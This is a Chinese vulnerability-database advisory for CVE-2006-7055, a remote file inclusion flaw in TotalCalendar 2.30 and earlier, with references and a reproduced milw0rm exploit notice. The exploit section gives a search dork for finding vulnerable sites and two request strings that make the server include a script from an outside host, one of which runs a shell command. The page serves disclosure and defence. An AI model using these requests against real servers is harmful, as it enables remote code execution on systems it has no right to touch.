TotalCalendar 'index.php'多个PHP远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110216 漏洞类型 输入验证
发布时间 2006-05-05 更新时间 2007-02-27
CVE编号 CVE-2006-7055 CNNVD-ID CNNVD-200702-473
漏洞平台 PHP CVSS评分 6.8
|漏洞来源
https://www.exploit-db.com/exploits/1753
https://cxsecurity.com/issue/WLB-2007020093
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200702-473
|漏洞详情
TotalCalendar是一种基于Web的日程管理系统。TotalCalendar处理用户请求时存在输入验证漏洞,远程攻击者可能利用此漏洞在服务器上以Web进程权限执行任意命令。TotalCalendar的about.php及auth.php脚本没有正确验证inc_dir参数的输入,允许攻击者通过包含本地或外部资源的任意文件导致执行任意代码。
|漏洞EXP
Title: TotalCalendar <=2.30 - Remote File Include Vulnerability
-----------------------------------------------------------------
Vendor: SweetPHP
URL: http://sweetphp.com
-----------------------------------------------------------------

Credits:
Discovered by: 'Aesthetico'
http://www.majorsecurity.de
-----------------------------------------------------------------
Search for: "Powered by TotalCalendar"
-----------------------------------------------------------------

Exploitation:

/index.php?inc_dir=http://www.yourspace.com/yourscript.php?
/index.php?inc_dir=http://www.yourspace.com/yourscript.txt?&ls%20-laF

# milw0rm.com [2006-05-05]
|参考资料

来源:sweetphp.com
链接:http://sweetphp.com/files/downloads/patches/TotalCalendar/Security_Patch.zip
来源:XF
名称:totalcalendar-about-file-include(25878)
链接:http://xforce.iss.net/xforce/xfdb/25878
来源:BID
名称:17618
链接:http://www.securityfocus.com/bid/17618
来源:BUGTRAQ
名称:20060423[MajorSecurity]TotalCalendar2.30-RemoteFileIncludeVulnerability
链接:http://www.securityfocus.com/archive/1/archive/1/431866/30/5370/threaded
来源:OSVDB
名称:25237
链接:http://www.osvdb.org/25237
来源:MILW0RM
名称:1753
链接:http://www.milw0rm.com/exploits/1753
来源:sweetphp.com
链接:http://sweetphp.com/nuke/index.php
来源:SREASON
名称:2290
链接:http://securityreason.com/securityalert/2290